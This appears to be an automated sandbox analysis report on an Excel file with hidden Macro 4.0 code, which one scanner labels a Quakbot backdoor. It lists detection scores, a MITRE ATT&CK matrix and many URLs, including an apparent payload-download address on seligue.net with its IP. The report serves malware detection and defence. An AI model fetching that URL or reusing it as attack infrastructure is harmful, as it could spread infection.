    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: regsvr32.exe, 00000001.00000002.231056704.0000000004280000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000001.00000002.231056704.0000000004280000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000001.00000002.231056704.0000000004280000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000001.00000002.231056704.0000000004280000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1425391613.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1425391613.xls35%VirustotalBrowse
    document-1425391613.xls14%MetadefenderBrowse
    document-1425391613.xls48%ReversingLabsDocument-Word.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    seligue.net1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://seligue.net/ds/231120.gif0%URL Reputationsafe
    https://seligue.net/ds/231120.gif0%URL Reputationsafe
    https://seligue.net/ds/231120.gif0%URL Reputationsafe
    https://seligue.net/ds/231120.gif0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    seligue.net
    192.185.215.146
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
      high
      https://login.microsoftonline.com/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
        high
        https://shell.suite.office.com:1443F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
              high
              https://cdn.entity.F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                high
                https://wus2-000.contentsync.F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkeyF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                    high
                    https://powerlift.acompli.netF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                      high
                      https://cortana.aiF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                high
                                https://api.aadrm.com/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                      high
                                      https://cr.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                            high
                                            https://graph.ppe.windows.netF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://seligue.net/ds/231120.gifdocument-1425391613.xlsfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                            high
                                                            https://graph.windows.netF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmediaF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.netF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policiesF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorizeF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/importsF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/macF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
